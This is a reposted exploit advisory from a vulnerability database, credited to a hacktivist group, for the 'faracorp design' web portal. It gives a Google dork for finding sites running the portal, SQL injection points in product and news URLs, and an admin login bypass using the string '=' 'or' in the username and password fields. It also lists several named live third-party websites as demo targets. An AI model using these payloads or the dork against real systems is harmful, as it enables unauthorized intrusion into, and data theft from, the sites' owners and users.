faracorp design Sql injection Vulnerability

Published
Credit
Risk
2016.11.19
Iranonymous
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: intext:"طراحی وب سایت و اجرا: پورتال هوشمند"

##########################
# Exploit Title: faracorp design Sql injection Vulnerability
# Google Dork : intext:"طراحی وب سایت و اجرا: پورتال هوشمند"
# Date:2016-11-19
# Discovered By: Ormazd
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Version: all
# Tested on : Win 10
##########################
## DP ##
hey . we have a security problem in the faracorp design
This is a multiple problem of security
1- sql in page course_view.php
2- Admin page bypass
####

Poc1 :

http://www.Site.com/path/product/[inject here]/.html
or
http://www.Site.com/path/news/view/[inject here]/.html
or
http://www.Site.com/path/news/[inject here]/.html

...

Demo:
http://www.dsteel.ir/products/4/.html
http://www.doudmanco.com/portal/news/view/5/.html
http://www.vese.ir/news/63/.html
####

Poc2:

http://site.com/admin

# Username : '=' 'or'

# Password : '=' 'or'

Demo:
http://www.dsteel.ir/admin/login.php
http://www.vese.ir/admin/login.php
http://www.alborzmachineco.com/admin/login.php
#############################

#Thanks to : MR.Khatar ||Turk-Khan || Blackwolf_Iran ||ll_azab-siyah_ll ||Sh@d0w ||Hellish_PN ||

And All Of Iranian Anonymous .

# Discovered By: Ormazd


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com